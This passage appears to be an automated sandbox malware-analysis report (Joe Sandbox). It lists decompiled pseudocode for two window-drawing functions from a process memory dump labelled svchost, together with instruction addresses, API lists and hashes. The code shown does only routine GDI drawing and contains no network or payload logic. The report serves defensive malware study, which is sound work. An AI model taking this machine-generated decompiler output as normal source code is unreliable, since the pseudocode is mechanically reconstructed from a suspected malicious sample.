    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Object$Select$Delete$Create$Compatible$Bitmap$ColorCountStretchTick__ftol$ClientDisplayEnumModeRectReleaseSettingsSleepWindow
    • String ID: DxI
    • API String ID: 1975044605-1614083780
    • Opcode ID: 1e639da4973506390d783c598d691916c05618e62b57df4c73938e63ed00b0fb
    • Instruction ID: 44bb3ddcab1ee2f4c986766a349b7a4dc77b7d798a5ae7dfa460e00b1e32f58b
    • Opcode Fuzzy Hash: 1e639da4973506390d783c598d691916c05618e62b57df4c73938e63ed00b0fb
    • Instruction Fuzzy Hash: 0D02B4B1244700AFD324DF65CD85F6BB7E9FB88B04F10492DF69693290D6B4E805CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00448760 Relevance: 38.0, APIs: 25, Instructions: 452windowCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E00448760(void* __ecx, intOrPtr* _a4, int _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				int _v20;
				signed int _v24;
				struct tagRECT _v40;
				char _v44;
				int _v48;
				int _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				char _v88;
				char _v92;
				struct tagRECT _v108;
				char _v112;
				char _v120;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v152;
				void* __ebp;
				void* _t159;
				void* _t170;
				void* _t172;
				long _t192;
				void* _t207;
				void* _t215;
				long _t226;
				void* _t243;
				signed int _t252;
				long* _t255;
				intOrPtr* _t258;
				char* _t281;
				int* _t310;
				intOrPtr* _t370;
				intOrPtr* _t371;
				void* _t376;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t396;

				_push(0xffffffff);
				_push(E004906E0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t396;
				_t376 = __ecx;
				_t252 = _a8;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x5c)) - 8)) == 0 || _t252 != 0xfffffffe) {
					if( *((intOrPtr*)( *((intOrPtr*)(_t376 + 0x58)) - 8)) == 0 || _t252 != 0xfffffffd) {
						_v88 =  &_v44;
						_t159 = E00448170(_t376, _t252,  &_v88);
						if(_t159 != 0) {
							_t370 = _a4;
							_a8 = 0;
							if((GetDeviceCaps( *(_t370 + 8), 0x26) & 0x00000001) != 0) {
								_v8 = E0048959D(_t370, _t376 + 0x98, 0);
								RealizePalette( *(_t370 + 4));
							}
							if( *((intOrPtr*)(_t376 + 0x54)) != _t252 ||  *((intOrPtr*)(_t376 + 0x50)) == _t252) {
								_push(GetSysColor(0xf));
								_push( &_v52);
							} else {
								_push(GetSysColor(0x14));
								_push( &_v52);
							}
							E0048BEC9(_t370);
							if( *((intOrPtr*)(_t376 + 0x50)) != _t252) {
								if( *((intOrPtr*)(_t376 + 0x54)) == _t252) {
									DrawEdge( *(_t370 + 4),  &(_v68.bottom), 2, 0xf);
									goto L35;
								}
							} else {
								DrawEdge( *(_t370 + 4),  &(_v68.bottom), 4, 0xf);
								L35:
							}
							_push(( *(0x4b4114 + _t252 * 8) >> 0x00000010 & 0x000000ff | 0x00000002) << 0x00000008 << 0x00000008 |  *(0x4b4114 + _t252 * 8) & 0x000000ff);
							E00489F7B( &_v88);
							_v20 = 2;
							_v108.bottom = 0;
							_v108.right = 0x498acc;
							_v20 = 3;
							E00489EBE( &_v112, CreatePen(0, 1, GetSysColor(0x10)));
							_t170 = E00489512(_t370,  &_v108);
							_t172 = E00489512(_t370,  &_v120);
							InflateRect( &_v84,  ~( *(_t376 + 0x4c) + 1),  ~( *(_t376 + 0x4c) + 1));
							Rectangle( *(_t370 + 4), _v84, _v84.top, _v84.right, _v84.bottom);
							E00489512(_t370, _t170);
							E00489512(_t370, _t172);
							E00489F15( &_v144);
							E00489F15( &_v152);
							_t379 = _v68.right;
							if(_v68.right != 0 && (GetDeviceCaps( *(_t370 + 8), 0x26) & 0x00000001) != 0) {
								E0048959D(_t370, _t379, 0);
							}
							_v132 = 0x498ac0;
							_v52 = 4;
							E00489F15( &_v132);
							_v124 = 0x498ac0;
							_v52 = 5;
							_t281 =  &_v124;
							goto L40;
						}
					} else {
						_t255 = _t376 + 0x70;
						_t192 = GetSysColor(0xf);
						_t371 = _a4;
						_push(_t192);
						E0048BEC9(_t371, _t255);
						_v68.top = _t255[1];
						_v68.left =  *_t255;
						_v68.right = _t255[2];
						_v68.bottom.left = _t255[3];
						InflateRect( &_v68, 0xffffffff, 0xffffffff);
						if( *((intOrPtr*)(_t376 + 0x54)) != 0xfffffffd ||  *((intOrPtr*)(_t376 + 0x50)) == 0xfffffffd) {
							_push(GetSysColor(0xf));
							_push( &(_v68.top));
						} else {
							_push(GetSysColor(0x16));
							_push( &(_v68.top));
						}
						E0048BEC9(_t371);
						_v40.top = _v68.left;
						_v40.right = _v68.top;
						_v40.left = _v84.bottom;
						_v40.bottom = _v68.right;
						InflateRect( &_v40,  ~( *(_t376 + 0x4c) << 1),  ~( *(_t376 + 0x4c) << 1));
						E00489F2B( &(_v84.top));
						_v40.bottom = 0;
						_t207 = E00489512(_t371,  &_v92);
						 *((intOrPtr*)( *_t371 + 0x24))(5, 0, 1, GetSysColor(0x10));
						Rectangle( *(_t371 + 4), _v68.right, _v68.bottom.left, _v52, _v48);
						E00489512(_t371, _t207);
						if( *((intOrPtr*)(_t376 + 0x50)) != 0xfffffffd) {
							if( *((intOrPtr*)(_t376 + 0x54)) == 0xfffffffd) {
								DrawEdge( *(_t371 + 4),  &(_v108.top), 2, 0xf);
								goto L22;
							}
						} else {
							DrawEdge( *(_t371 + 4),  &(_v108.top), 4, 0xf);
							L22:
						}
						_t215 =  *((intOrPtr*)( *_t371 + 0x28))(_t376 + 0x90);
						E004895EE(_t371, 1);
						_t381 =  *((intOrPtr*)(_t376 + 0x58));
						 *((intOrPtr*)( *_t371 + 0x68))(_t381,  *((intOrPtr*)(_t381 - 8)),  &_v112, 0x25);
						 *((intOrPtr*)( *_t371 + 0x28))(_t215);
						_v140 = 0x498ac0;
						_v84.right = 1;
						_t281 =  &_v140;
						L40:
						_t159 = E00489F15(_t281);
					}
				} else {
					_t372 = __ecx + 0x60;
					_t310 = __ecx + 0x60;
					_v68.right =  *_t310;
					_v52 = _t310[2];
					_v48 = _t310[3];
					_v68.bottom = _t310[1] +  *(__ecx + 0x4c) * 2;
					_t226 = GetSysColor(0xf);
					_t258 = _a4;
					_push(_t226);
					E0048BEC9(_t258,  &(_v68.right));
					_v4 =  *(_t376 + 0x4c);
					E0048BEF3(_t258,  *_t372 + _v4 * 2,  *((intOrPtr*)(_t376 + 0x64)), _t372[2] -  *_t372 - _v4 * 4, 1, GetSysColor(0x10));
					_v24 =  *(_t376 + 0x4c);
					E0048BEF3(_t258,  *_t372 + _v24 * 2,  *((intOrPtr*)(_t376 + 0x64)) + 1, _t372[2] -  *_t372 - _v24 * 4, 1, GetSysColor(0x14));
					InflateRect( &_v108, 0xffffffff, 0xffffffff);
					if( *((intOrPtr*)(_t376 + 0x54)) != 0xfffffffe ||  *((intOrPtr*)(_t376 + 0x50)) == 0xfffffffe) {
						_push(GetSysColor(0xf));
						_push( &(_v68.top));
					} else {
						_push(GetSysColor(0x16));
						_push( &(_v68.top));
					}
					E0048BEC9(_t258);
					if( *((intOrPtr*)(_t376 + 0x50)) != 0xfffffffe) {
						if( *((intOrPtr*)(_t376 + 0x54)) == 0xfffffffe) {
							DrawEdge( *(_t258 + 4),  &_v68, 2, 0xf);
							goto L10;
						}
					} else {
						DrawEdge( *(_t258 + 4),  &_v68, 4, 0xf);
						L10:
					}
					_t243 =  *((intOrPtr*)( *_t258 + 0x28))(_t376 + 0x90);
					E004895EE(_t258, 1);
					_t382 =  *((intOrPtr*)(_t376 + 0x5c));
					 *((intOrPtr*)( *_t258 + 0x68))(_t382,  *((intOrPtr*)(_t382 - 8)),  &(_v84.right), 0x25);
					_t159 =  *((intOrPtr*)( *_t258 + 0x28))(_t243);
				}
				 *[fs:0x0] = _v12;
				return _t159;
			}












































    0x00448766
    0x00448768
    0x0044876d
    0x0044876e
    0x0044877b
    0x0044877d
    0x0044878a
    0x004488fe
    0x00448a9b
    0x00448a9f
    0x00448aa6
    0x00448aac
    0x00448ab2
    0x00448ac7
    0x00448adc
    0x00448ae1
    0x00448ae1
    0x00448aea
    0x00448b0d
    0x00448b12
    0x00448af1
    0x00448aff
    0x00448b00
    0x00448b00
    0x00448b15
    0x00448b1d
    0x00448b31
    0x00448b40
    0x00000000
    0x00448b40
    0x00448b1f
    0x00448b40
    0x00448b40
    0x00448b40
    0x00448b78
    0x00448b79
    0x00448b7e
    0x00448b86
    0x00448b8e
    0x00448b98
    0x00448baf
    0x00448bbb
    0x00448bc9
    0x00448be3
    0x00448c01
    0x00448c0a
    0x00448c12
    0x00448c1b
    0x00448c24
    0x00448c29
    0x00448c2f
    0x00448c47
    0x00448c47
    0x00448c51
    0x00448c59
    0x00448c5e
    0x00448c63
    0x00448c67
    0x00448c6f
    0x00000000
    0x00448c6f
    0x0044890d
    0x00448915
    0x00448918
    0x0044891a
    0x0044891e
    0x00448922
    0x0044892f
    0x00448933
    0x00448949
    0x0044894d
    0x00448951
    0x0044895d
    0x00448978
    0x00448979
    0x00448964
    0x00448968
    0x0044896d
    0x0044896d
    0x0044897c
    0x0044898d
    0x00448994
    0x0044899a
    0x004489a4
    0x004489b3
    0x004489c2
    0x004489ce
    0x004489d6
    0x004489e3
    0x004489fe
    0x00448a07
    0x00448a16
    0x00448a2a
    0x00448a39
    0x00000000
    0x00448a39
    0x00448a18
    0x00448a39
    0x00448a39
    0x00448a39
    0x00448a4a
    0x00448a53
    0x00448a58
    0x00448a6b
    0x00448a73
    0x00448a76
    0x00448a7e
    0x00448a86
    0x00448c73
    0x00448c73
    0x00448c73
    0x00448799
    0x00448799
    0x0044879e
    0x004487a2
    0x004487ac
    0x004487b9
    0x004487bd
    0x004487c1
    0x004487c7
    0x004487cf
    0x004487d3
    0x004487e4
    0x0044880b
    0x0044881c
    0x00448844
    0x00448852
    0x00448862
    0x00448885
    0x00448886
    0x00448869
    0x00448875
    0x00448876
    0x00448876
    0x00448889
    0x00448891
    0x004488a5
    0x004488b4
    0x00000000
    0x004488b4
    0x00448893
    0x004488b4
    0x004488b4
    0x004488b4
    0x004488c5
    0x004488ce
    0x004488d3
    0x004488e6
    0x004488ee
    0x004488ee
    0x00448c80
    0x00448c8a

    APIs
    • GetSysColor.USER32(00000010), ref: 004487E8
      • Part of subcall function 0048BEF3: SetBkColor.GDI32(?,?), ref: 0048BF02
      • Part of subcall function 0048BEF3: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0048BF34
    • GetSysColor.USER32(00000014), ref: 00448820
    • InflateRect.USER32(?,000000FF,000000FF), ref: 00448852
    • GetSysColor.USER32(00000016), ref: 0044886B
    • GetSysColor.USER32(0000000F), ref: 0044887B
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 004488B4
    • GetDeviceCaps.GDI32(?), ref: 00448ABE
    • RealizePalette.GDI32(?), ref: 00448AE1
    • GetSysColor.USER32(00000014), ref: 00448AF9
    • GetSysColor.USER32(0000000F), ref: 00448B0B
    • GetSysColor.USER32(0000000F), ref: 004487C1
      • Part of subcall function 0048BEC9: SetBkColor.GDI32(?,?), ref: 0048BED3
      • Part of subcall function 0048BEC9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0048BEE9
    • GetSysColor.USER32(0000000F), ref: 00448918
    • InflateRect.USER32(?,000000FF,000000FF), ref: 00448951
    • GetSysColor.USER32(00000016), ref: 00448966
    • GetSysColor.USER32(0000000F), ref: 00448972
    • InflateRect.USER32(?,?,?), ref: 004489B3
    • GetSysColor.USER32(00000010), ref: 004489B7
    • Rectangle.GDI32(?,?,?,?,?), ref: 004489FE
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 00448A39
    • DrawEdge.USER32(?,?,00000002,0000000F), ref: 00448B40
    • GetSysColor.USER32(00000010), ref: 00448B9D
    • CreatePen.GDI32(00000000,00000001,00000000), ref: 00448BA4
    • InflateRect.USER32(?,?,?), ref: 00448BE3
    • Rectangle.GDI32(?,?,?,?,?), ref: 00448C01
    • GetDeviceCaps.GDI32(?,00000026), ref: 00448C37
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Color$InflateRect$DrawEdge$CapsDeviceRectangleText$CreatePaletteRealize
    • String ID:
    • API String ID: 3119264602-0
    • Opcode ID: c40bced6907cb01c54eb932bea9f1fa2bd124cfb037f5dbd86643705824c6103
    • Instruction ID: 5695caa02def92cc05cd3739fafe5a8f7e32d3753678329eee2a2bf7f29c1fe6
    • Opcode Fuzzy Hash: c40bced6907cb01c54eb932bea9f1fa2bd124cfb037f5dbd86643705824c6103
    • Instruction Fuzzy Hash: 75F15671204701AFD714EB64C885E7FB3E9FB88714F048A2EF69687291DBB4E805CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E3C0 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 384windowCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E0040E3C0(void* __ecx, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v24;
				char _v52;
				char _v76;
				int _v84;
				char _v92;
				char _v100;
				struct HDC__* _v108;
				char _v112;
				char _v116;
				struct HDC__* _v120;
				struct tagRECT _v136;
				intOrPtr _v148;
				struct HDC__* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				int _v176;
				struct HDC__* _v180;
				char _v184;
				char _v188;
				char _v192;
				struct tagRECT _v208;
				intOrPtr _v216;
				int _v220;
				intOrPtr _v224;
				char _v228;
				int _v232;
				int _v240;
				int _v244;
				int _v248;
				int _v252;
				int _v256;
				int _v260;
				intOrPtr _v264;
				int _v268;
				int _v272;
				struct tagRECT _v288;
				void* __ebp;
				int _t147;
				int _t153;
				int _t157;
				signed int _t162;
				signed int _t170;
				int* _t173;
				signed int _t176;
				int _t178;
				void* _t186;
				long _t191;
				void* _t210;
				void* _t212;
				int _t221;
				intOrPtr _t229;
				int _t246;
				int _t258;
				signed int _t264;
				void* _t267;
				int _t272;
				void* _t275;
				int _t280;
				int _t284;
				intOrPtr _t286;

				_push(0xffffffff);
				_push(0x48df90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t212 = __ecx;
				_push(__ecx);
				E00489D7E( &_v112, __eflags);
				_v8 = 0;
				E0048992F( &_v116,  &(_v136.top));
				_t147 = IsRectEmpty( &_v136);
				_t292 = _t147 - 1;
				if(_t147 != 1) {
					_push(GetCurrentObject(_v108, 2));
					_v148 = E00489EA9();
					_push(GetCurrentObject(_v120, 1));
					_v172 = E00489EA9();
					_t153 =  *(_t212 + 0x4c);
					__eflags = _t153;
					if(_t153 != 0) {
						__eflags = _t153 - 1;
						if(_t153 != 1) {
							__eflags = _t153 - 2;
							if(_t153 != 2) {
								__eflags = _t153 - 3;
								if(_t153 != 3) {
									__eflags = _t153 - 4;
									_t221 = (0 | _t153 != 0x00000004) + 3;
									__eflags = _t221;
									_t272 = _t221;
								} else {
									_t272 = 2;
								}
							} else {
								_t272 = 1;
							}
						} else {
							_t272 = 6;
						}
					} else {
						_t272 = 5;
					}
					__eflags =  *(_t212 + 0x48);
					if( *(_t212 + 0x48) != 0) {
						L14:
						_t264 = 1;
					} else {
						__eflags = _t153 - 1;
						if(_t153 != 1) {
							goto L14;
						} else {
							_t264 =  *(_t212 + 0x50);
						}
					}
					_v184 = 0;
					_v188 = 0x495e94;
					_v176 = 0;
					_v180 = 0x495e94;
					_v24 = 2;
					GetClientRect( *(_t212 + 0x1c),  &_v208);
					_t157 =  *(_t212 + 0x48);
					__eflags = _t157;
					if(_t157 != 0) {
						__eflags = _t157 - 1;
						if(_t157 != 1) {
							E00489EBE( &(_v208.right), CreatePen(_t272, 0, 0));
							_push(0xffffff);
						} else {
							E00489EBE( &(_v208.right), CreatePen(_t272, 0, 0xffffff));
							_push(0);
						}
						E00489EBE( &(_v208.top), CreatePen(_t272, 0, ??));
						_t162 =  *(_t212 + 0x44);
						__eflags = _t162 - 6;
						if(_t162 == 6) {
							L24:
							_t36 =  &_v228;
							 *_t36 = _v228 + 1;
							__eflags =  *_t36;
						} else {
							__eflags = _t162 - 7;
							if(_t162 != 7) {
								_t34 =  &_v232;
								 *_t34 = _v232 + 1;
								__eflags =  *_t34;
								goto L24;
							} else {
								_v232 = _v232 + 1;
							}
						}
					} else {
						asm("sbb ecx, ecx");
						E00489EBE( &(_v208.right), CreatePen(_t272,  ~(_t264 - 1) & _t264,  *(_t212 + 0x54)));
					}
					_push(E0040C100( *((intOrPtr*)(_t212 + 0x40))));
					E00489F7B( &_v184);
					_v52 = 3;
					E00489512( &_v160,  &_v188);
					_t258 = _v176;
					PatBlt(_v160, _v180, _t258, _v172 - _v180, _v168 - _t258, 0xf00021);
					_t229 = _v264;
					_t280 = _v260;
					_t170 =  *(_t212 + 0x44);
					_t275 = _v256 - _t229;
					_t267 = _v252 - _t280;
					__eflags = _t170 - 1;
					if(_t170 == 1) {
						L28:
						__eflags = _t267 - _t275;
						if(__eflags >= 0) {
							if(__eflags > 0) {
								asm("cdq");
								_t284 = _t280 + (_t267 - _t275 - _t258 >> 1);
								__eflags = _t284;
								_v256 = _t284;
								_v248 = _t275 + _t284;
							}
						} else {
							asm("cdq");
							_t246 = _t229 + (_t275 - _t267 - _t258 >> 1);
							_v260 = _t246;
							_v252 = _t267 + _t246;
						}
					} else {
						__eflags = _t170 - 3;
						if(_t170 == 3) {
							goto L28;
						} else {
							__eflags = _t170 - 5;
							if(_t170 == 5) {
								goto L28;
							}
						}
					}
					__eflags = 0;
					_v224 = 0x495e54;
					_v220 = 0;
					_v76 = 4;
					E004895EE( &_v184, 1);
					_v248 = 0;
					do {
						__eflags = _v244;
						if(_v244 == 0) {
							_t173 =  &_v240;
							goto L36;
						} else {
							__eflags =  *(_t212 + 0x48);
							if( *(_t212 + 0x48) != 0) {
								_t173 =  &_v232;
								L36:
								E00489512( &_v184, _t173);
								__eflags = _v248 - 1;
								if(_v248 == 1) {
									L40:
									E004894D6( &_v184, 5);
								} else {
									_t191 =  *(_t212 + 0x58);
									__eflags = _t191 - 0xff000000;
									if(_t191 == 0xff000000) {
										goto L40;
									} else {
										E00489EBE( &_v228, CreateSolidBrush(_t191));
										_t71 =  &_v232; // 0x495e54
										E00489512( &_v192, _t71);
									}
								}
								_t176 =  *(_t212 + 0x44);
								__eflags = _t176 - 7;
								if(_t176 <= 7) {
									switch( *((intOrPtr*)(_t176 * 4 +  &M0040E88C))) {
										case 0:
											Rectangle(_v180, _v260, _v256, _v252, _v248);
											OffsetRect( &(_v288.right), 0xffffffff, 0xffffffff);
											goto L48;
										case 1:
											__ecx = _v256;
											Ellipse(_v180, _v260, _v256, _v252, _v248);
											__ecx =  &(_v288.right);
											OffsetRect(__ecx, 0xffffffff, 0xffffffff);
											goto L48;
										case 2:
											(0x66666667 * __esi >> 0x20 >> 1) + (0x66666667 * __esi >> 0x20 >> 1 >> 0x1f) = _v248;
											__ecx = _v260;
											RoundRect(_v180, __ecx, _v256, _v252, _v248, __ecx, _v180);
											OffsetRect( &_v288, 0xffffffff, 0xffffffff);
											goto L48;
										case 3:
											__ecx = _v256;
											__ecx =  &_v184;
											E00489A03( &_v184,  &_v92, _v260, _v256);
											__ecx = _v268;
											__ecx =  &(_v208.bottom);
											E00489A4F(__ecx, _v264, _v268);
											_v288.bottom = _v288.bottom - 1;
											goto L48;
										case 4:
											__ecx = _v260;
											__ecx =  &_v184;
											E00489A03( &_v184,  &_v100, _v260, _v256);
											__ecx = _v272;
											__ecx =  &(_v208.bottom);
											E00489A4F(__ecx, _v272, _v260);
											_t120 =  &(_v288.right);
											 *_t120 = _v288.right.left - 1;
											__eflags =  *_t120;
											goto L48;
									}
								}
								goto L48;
							}
						}
						break;
						L48:
						_t178 = _v244 + 1;
						__eflags = _t178 - 1;
						_v244 = _t178;
					} while (_t178 <= 1);
					E00489512( &_v184, _v216);
					E00489512( &_v188, _v208.left);
					_v232 = 0x495e6c;
					_t129 =  &_v232; // 0x495e54
					_v84 = 5;
					E00489F15(_t129);
					_v220 = 0x495e6c;
					_v84 = 6;
					E00489F15( &_v220);
					_v240 = 0x495e6c;
					_v84 = 7;
					E00489F15( &_v240);
					_v248 = 0x495e6c;
					_v84 = 8;
					E00489F15( &_v248);
					_v84 = 0xffffffff;
					_t186 = E00489DF0( &_v192, __eflags);
					 *[fs:0x0] = _v92;
					return _t186;
				} else {
					_v8 = 0xffffffff;
					_t210 = E00489DF0( &_v116, _t292);
					 *[fs:0x0] = _v16;
					return _t210;
				}
			}

































































    0x0040e3c0
    0x0040e3c2
    0x0040e3cd
    0x0040e3ce
    0x0040e3dc
    0x0040e3df
    0x0040e3e4
    0x0040e3f4
    0x0040e3fb
    0x0040e405
    0x0040e40b
    0x0040e40e
    0x0040e44c
    0x0040e452
    0x0040e45f
    0x0040e465
    0x0040e469
    0x0040e46c
    0x0040e46e
    0x0040e477
    0x0040e47a
    0x0040e483
    0x0040e486
    0x0040e48f
    0x0040e492
    0x0040e49d
    0x0040e4a3
    0x0040e4a3
    0x0040e4a6
    0x0040e494
    0x0040e494
    0x0040e494
    0x0040e488
    0x0040e488
    0x0040e488
    0x0040e47c
    0x0040e47c
    0x0040e47c
    0x0040e470
    0x0040e470
    0x0040e470
    0x0040e4a8
    0x0040e4ab
    0x0040e4b7
    0x0040e4b7
    0x0040e4ad
    0x0040e4ad
    0x0040e4b0
    0x00000000
    0x0040e4b2
    0x0040e4b2
    0x0040e4b2
    0x0040e4b0
    0x0040e4c1
    0x0040e4c5
    0x0040e4c9
    0x0040e4cd
    0x0040e4da
    0x0040e4e2
    0x0040e4e8
    0x0040e4eb
    0x0040e4ed
    0x0040e510
    0x0040e513
    0x0040e541
    0x0040e546
    0x0040e515
    0x0040e529
    0x0040e52e
    0x0040e52e
    0x0040e554
    0x0040e559
    0x0040e55c
    0x0040e55f
    0x0040e570
    0x0040e570
    0x0040e570
    0x0040e570
    0x0040e561
    0x0040e561
    0x0040e564
    0x0040e56c
    0x0040e56c
    0x0040e56c
    0x00000000
    0x0040e566
    0x0040e566
    0x0040e566
    0x0040e564
    0x0040e4ef
    0x0040e4f8
    0x0040e509
    0x0040e509
    0x0040e584
    0x0040e585
    0x0040e593
    0x0040e59b
    0x0040e5a4
    0x0040e5c2
    0x0040e5cc
    0x0040e5d4
    0x0040e5d8
    0x0040e5db
    0x0040e5dd
    0x0040e5df
    0x0040e5e2
    0x0040e5ee
    0x0040e5ee
    0x0040e5f0
    0x0040e60a
    0x0040e610
    0x0040e615
    0x0040e615
    0x0040e617
    0x0040e61e
    0x0040e61e
    0x0040e5f2
    0x0040e5f6
    0x0040e5fb
    0x0040e5fd
    0x0040e604
    0x0040e604
    0x0040e5e4
    0x0040e5e4
    0x0040e5e7
    0x00000000
    0x0040e5e9
    0x0040e5e9
    0x0040e5ec
    0x00000000
    0x00000000
    0x0040e5ec
    0x0040e5e7
    0x0040e622
    0x0040e624
    0x0040e62c
    0x0040e636
    0x0040e63e
    0x0040e643
    0x0040e64d
    0x0040e651
    0x0040e653
    0x0040e6a0
    0x00000000
    0x0040e655
    0x0040e658
    0x0040e65a
    0x0040e660
    0x0040e664
    0x0040e669
    0x0040e66e
    0x0040e673
    0x0040e6a6
    0x0040e6ac
    0x0040e675
    0x0040e675
    0x0040e678
    0x0040e67d
    0x00000000
    0x0040e67f
    0x0040e68b
    0x0040e690
    0x0040e699
    0x0040e699
    0x0040e67d
    0x0040e6b1
    0x0040e6b4
    0x0040e6b7
    0x0040e6bd
    0x00000000
    0x0040e6dd
    0x0040e6ec
    0x00000000
    0x00000000
    0x0040e6fb
    0x0040e70c
    0x0040e714
    0x0040e71b
    0x00000000
    0x00000000
    0x0040e74e
    0x0040e753
    0x0040e75f
    0x0040e76e
    0x00000000
    0x00000000
    0x0040e772
    0x0040e784
    0x0040e788
    0x0040e78d
    0x0040e797
    0x0040e79b
    0x0040e7a0
    0x00000000
    0x00000000
    0x0040e7aa
    0x0040e7b8
    0x0040e7bc
    0x0040e7c5
    0x0040e7cb
    0x0040e7cf
    0x0040e7d4
    0x0040e7d4
    0x0040e7d4
    0x00000000
    0x00000000
    0x0040e6bd
    0x00000000
    0x0040e6b7
    0x0040e65a
    0x00000000
    0x0040e7d8
    0x0040e7dc
    0x0040e7dd
    0x0040e7e0
    0x0040e7e0
    0x0040e7f3
    0x0040e801
    0x0040e80b
    0x0040e80f
    0x0040e813
    0x0040e81b
    0x0040e820
    0x0040e828
    0x0040e830
    0x0040e835
    0x0040e83d
    0x0040e845
    0x0040e84a
    0x0040e852
    0x0040e85a
    0x0040e863
    0x0040e86e
    0x0040e87e
    0x0040e88b
    0x0040e410
    0x0040e414
    0x0040e41f
    0x0040e42d
    0x0040e43a
    0x0040e43a

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 0048992F: GetClipBox.GDI32(?,?), ref: 00489936
    • IsRectEmpty.USER32(?), ref: 0040E405
    • GetCurrentObject.GDI32(?,00000002), ref: 0040E44A
    • GetCurrentObject.GDI32(?,00000001), ref: 0040E45D
    • GetClientRect.USER32 ref: 0040E4E2
    • CreatePen.GDI32(-00000003,00000000,?), ref: 0040E4FE
    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0040E5C2
      • Part of subcall function 00489DF0: __EH_prolog.LIBCMT ref: 00489DF5
      • Part of subcall function 00489DF0: EndPaint.USER32(?,?,?,?,0040D373), ref: 00489E12
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologObjectPaintRect$BeginClientClipCreateEmpty
